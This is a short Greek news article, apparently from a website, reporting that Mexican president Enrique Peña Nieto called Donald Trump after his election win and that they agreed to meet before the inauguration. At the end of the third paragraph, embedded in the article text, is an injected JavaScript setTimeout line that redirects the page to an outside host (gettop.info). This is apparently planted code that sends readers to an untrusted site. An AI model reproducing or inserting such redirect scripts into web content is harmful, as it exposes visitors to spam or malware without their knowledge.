Τραμπ και Νιέτο συμφώνησαν να συναντηθούν πριν αναλάβει επίσημα

0
9

 

Ο πρόεδρος του Μεξικού Ενρίκε Πένια Νιέτο δήλωσε ότι συνομίλησε με τον Ντόναλντ Τραμπ, ο οποίος εξελέγη στην προεδρία των ΗΠΑ, για να του εκφράσει τα συγχαρητήρια του για την νίκη του μεγιστάνα των ακινήτων στις προεδρικές εκλογές, σημειώνοντας πως συμφώνησαν να συναντηθούν πριν ο Τραμπ αναλάβει τα προεδρικά του καθήκοντα.

Ο Νιέτο πρόσθεσε πως συζήτησε με τον Τραμπ μια νέα ατζέντα θεμάτων που μπορεί να περιλαμβάνει ζητήματα ασφάλειας, τονίζοντας πως θα επιδιώξει να προστατέψει τα δικαιώματα των Μεξικανών σε όλο τον κόσμο.

«Συμφωνήσαμε με τον νεοεκλεγέντα πρόεδρο να συναντηθούμε κατά την μεταβατική περίοδο (πριν ορκιστεί ο Τραμπ τον Ιανουάριο πρόεδρος των ΗΠΑ) για να καθορίσουμε την κατεύθυνση που θα πάρουν οι σχέσεις μεταξύ των δύο χωρών«, δήλωσε στους δημοσιογράφους ο Μεξικανός πρόεδρος, χαρακτηρίζοντας την τηλεφωνική συνομιλία με τον Ρεπουμπλικάνο υποψήφιο, που κατά τη διάρκεια της προεκλογικής εκστρατείας είχε προβεί σε βιτριολικές δηλώσεις εναντίον των μεταναστών, κυρίως των Μεξικανών, «εγκάρδια, φιλική, γεμάτη σεβασμό». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here